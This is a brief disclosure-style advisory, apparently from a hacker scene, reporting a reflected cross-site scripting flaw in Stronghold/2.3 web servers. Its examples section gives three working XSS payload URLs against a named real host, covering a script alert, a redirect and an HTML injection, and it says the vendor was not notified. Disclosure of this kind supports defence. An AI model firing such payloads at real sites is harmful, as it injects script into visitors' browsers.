========================================================================
================

!vuln

Stronghold/2.3 Apache/1.2.6 C2NetUS/2007

Previous versions may also be affected.

========================================================================
================

========================================================================
================

!risk

Low

There are currently only a few websites circulating with

Stronghold/2.3 enabled.

========================================================================
================

========================================================================
================

!notes

Stronghold/2.3 does not properly sanitize user input and echoes the page requested in

the URL as valid HTML and Javascript. This can cause XSS flaws.

========================================================================
================

========================================================================
================

!examples

Example 1: http://world.std.com/<script>alert("lol");</script>

Example 2: http://world.std.com/<script>window.location="http://www.google.com"</sc
ript>

Example 3: http://world.std.com/<body bgcolor="black"><font color="green">

========================================================================
================

========================================================================
================

!solution

Do not use Stronghold/2.3. The vendor has not been notified.

========================================================================
================

============================================================

!greetz

Greetz go out to the people who know me.

============================================================

============================================================

!author

Xia Shing Zee

============================================================